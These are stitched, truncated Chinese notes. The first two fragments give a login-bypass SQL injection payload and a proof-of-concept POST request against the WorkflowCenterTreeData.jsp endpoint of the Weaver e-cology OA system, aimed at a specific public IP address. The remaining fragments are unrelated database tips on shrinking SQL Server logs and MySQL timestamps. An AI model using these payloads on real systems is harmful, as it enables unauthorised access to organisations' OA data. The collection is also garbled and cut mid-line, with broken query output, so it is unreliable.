SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 - loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&a
0x00概述 该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞. 0x01影响范围 使用oracle数据库的泛微 e-cology OA 系统 poc POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1 Host:122.224.179.98:443 User-Agent: M
---收缩数据库日志文件 USE [master]ALTER DATABASE yourdatabasename SET RECOVERY SIMPLE WITH NO_WAITALTER DATABASE yourdatabasename SET RECOVERY SIMPLE USE yourdatabasename DBCC SHRINKFILE (N'yourdatabasename _Log' , 0,TRUNCATEONLY) --数据库日志文件名(数据库右键-属性-日志逻辑文件名)
自动更新修改时间: mysql> create table z(a int ,b timestamp on update current_timestamp); mysql> insert into z ,current_timestamp; mysql> select * from z; +------+---------------------+ | a | b | +------+---------------------+ | | -- :: | +------+--------